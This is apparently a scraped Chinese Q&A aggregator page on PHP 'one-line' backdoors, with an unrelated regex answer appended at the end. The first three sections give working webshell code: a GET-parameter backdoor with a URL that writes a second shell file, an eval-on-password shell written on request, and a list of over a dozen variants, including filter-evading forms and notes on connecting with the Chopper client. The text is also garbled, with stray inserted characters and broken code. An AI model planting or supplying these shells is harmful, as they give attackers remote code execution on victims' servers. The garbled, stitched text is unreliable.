php變形一句話

『壹』 php一句話木馬～呢

超級隱蔽的PHP後門：
<?php $_GET[a]($_GET[b]);?>

僅用GET函數就構成了木馬；
利用方法：
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%%29%29};

執行後當前目錄生成c.php一句話木馬，當傳參a為eval時會報錯木馬生成失敗，為assert時同樣報錯，但會生成木馬，真可謂不可小視，簡簡單單的一句話，被延伸到這般應用

『貳』 寫一個PHP一句話木馬密碼為file

PHP一句話木馬是一種利用PHP的eval函數執行任意代碼的後門程序。一般格式為雹殲培：
<?php @eval ($_POST ['password']);?>

其中，password是連接木馬時需要輸入的密碼，可以自定義。如果您想要寫一個密碼為file的一句話木馬，那麼可以這樣寫：
<?php @eval ($_POST ['file']);?>

請注意，這種木馬非常源唯危險，可能導致網站被黑客入侵或破壞，請謹慎使用改橡。

『叄』 一個有意思的 PHP 一句話後門，怎麼破

<?php eval($_POST1);?>
<?php if(isset($_POST['c'])){eval($_POST['c']);}?>
<?php system($_REQUEST1);?>
<?php ($_=@$_GET1).@$_($_POST1)?>
<?php eval_r($_POST1)?>
<?php @eval_r($_POST1)?>//容錯代碼
<?php assert($_POST1);?>//使用Lanker一句話客戶端的專家模式執行相關的PHP語句
<?$_POST['c']($_POST['cc']);?>
<?$_POST['c']($_POST['cc'],$_POST['cc'])?>
<?php

@preg_replace("/[email]/e",$_POST['h'],"error");?>/*使用這個後,使用菜刀一句話客戶端在
配置連接的時候在"配置"一欄輸入*/:<O>h=@eval_r($_POST1);</O>
<?php echo `$_GET['r']` ?>
//繞過<?限制的一句話
<script language="php">@eval_r($_POST[sb])</script>

『肆』 使用php正則式去除字元串中最後一個斜杠及之後的內容

可以參考下面的兩種方法：

1、var s = '一句話描/述(您的)/疑問/123一二三abc';

s.replace(/(.*)/{1}.*/, '$1'); //標准模式下，.*會自動匹配到最後一個位置

//輸出 "一句話描/述(您的)/疑問"

2、$str = '一句話描/述(您的)疑問/123一二三abc';

$str = preg_replace('/(.*)/{1}([^/]*)/i', '$1', $str);

echo $str;

(4)php變形一句話擴展閱讀：

PHP正則表達式中的參考函數：

pattern: 要搜索的模式，字元串類型。

subject：輸入字元串。

match： 如果提供了參數matches，它將被填充為搜索結果,數據結構為一維數組。

flags: 可以設置為PREG_OFFSET_CAPTURE，使用搜索結果的第0個元素為匹配的字元串，第1個元素為對應的偏移量（位置）

offset: 搜索從目標字元串的起始位置開始匹配。

pattern：要搜索的模式。可以是一個字元串或字元串數組。

replacement：用於替換的字元串或字元串數組